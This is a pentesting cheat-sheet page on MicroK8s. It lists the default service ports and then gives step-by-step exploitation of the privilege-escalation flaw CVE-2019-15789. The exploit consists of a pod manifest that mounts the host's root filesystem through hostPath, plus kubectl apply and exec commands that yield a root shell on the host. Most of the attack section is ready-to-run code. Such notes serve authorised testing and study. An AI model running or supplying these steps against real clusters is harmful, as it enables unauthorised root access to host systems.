# MicroK8s Pentesting MicroK8s is a small, fast, single-package Kubernetes for developers. ### Ports and Services * Port 10250 - kubelet * Port 10255 - kubelet (read only) * Port 10257 - kube-controller * Port 10259 - kube-scheduler * Port 16443 - API server * Port 25000 - cluster-agent * Port 32000 - Docker registry
### Docker Registry (port 32000) It is the same as[ Docker Registry Pentesting ](https://hamcodes.gitbook.io/hackersnotes/cloud-hacking/docker-and-and-kubernetes/docker-registry-pentesting). ### Investigation from Inside ```shellscript # Version snap info microk8s ``` ### Privilege Escalation (CVE-2019-15789) ≤ 1.15.2 See [the post](https://pulsesecurity.co.nz/advisories/microk8s-privilege-escalation) for details. #### 1. Create a Pod Yaml File Replace the value of spec.containers.image with the image which we found in target system. ```shellscript apiVersion: v1 kind: Pod metadata: name: hostmount spec: containers: - name: shell image: ubuntu:latest command: - "bin/bash" - "-c" - "sleep 10000" volumeMounts: - name: root mountPath: /opt/root volumes: - name: root hostPath: path: / type: Directory ``` #### 2. Apply the Yaml and Get a Root Shell ```shellscript microk8s kubectl apply -f exploit.yaml # "hostmount" is the value of the metadata.name in the exploit.yaml microk8s kubectl exec -it hostmount /bin/bash ``` #### 3. Explore Directories After getting a shell, we can explore the directories under /opt/root which is mounted volume. ```shellscript cd /opt/root ``` ### References * [MicroK8s](https://microk8s.io/docs/services-and-ports)